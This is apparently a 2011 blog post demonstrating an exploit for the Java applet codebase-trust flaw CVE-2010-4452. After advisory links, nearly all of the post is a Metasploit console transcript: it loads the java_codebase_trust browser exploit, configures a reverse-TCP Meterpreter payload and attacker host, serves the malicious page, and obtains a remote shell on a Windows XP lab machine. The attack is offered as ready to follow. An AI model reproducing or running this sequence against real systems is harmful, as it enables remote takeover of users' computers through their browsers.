Another Java exploit


info :

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-4452
http://www.osvdb.org/71193
http://www.zerodayinitiative.com/advisories/ZDI-11-084/
http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/
http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html

exploit working againts windows xp sp3 and Firefox 3.6.12 with JRE 1.6.0_23.but fail on windows 7 sp1 with same configuration..
hope you enjoy..

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ — –=[ 658 exploits – 343 auxiliary
+ — –=[ 217 payloads – 27 encoders – 8 nops
=[ svn r12021 updated today (2011.03.18)

msf > use exploit/windows/browser/java_codebase_trust
msf exploit(java_codebase_trust) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_codebase_trust) > set LHOST 172.16.16.2
LHOST => 172.16.16.2
msf exploit(java_codebase_trust) > set SRVHOST 172.16.16.2
SRVHOST => 172.16.16.2
msf exploit(java_codebase_trust) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_codebase_trust) > set URIPATH /
URIPATH => /
msf exploit(java_codebase_trust) > exploit -k
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.16.2:4444
[*] Using URL: http://172.16.16.2:80/
[*] Server started.
msf exploit(java_codebase_trust) > [*] Sending HTML file to 172.16.16.10:1063…
[*] Sending HTML file to 172.16.16.10:1063…
[*] Sending class file to 172.16.16.10:1064…
[*] Sending class file to 172.16.16.10:1064…
[*] Sending stage (27642 bytes) to 172.16.16.10
[*] Meterpreter session 1 opened (172.16.16.2:4444 -> 172.16.16.10:1065) at 2011-03-19 09:36:12 +0700
[*] Sending HTML file to 172.16.16.10:1063…

msf exploit(java_codebase_trust) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > sysinfo
Computer : yan-5fe04791245
OS : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>

Posted on March 19, 2011, in Hacking & security and tagged , , , , , , . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: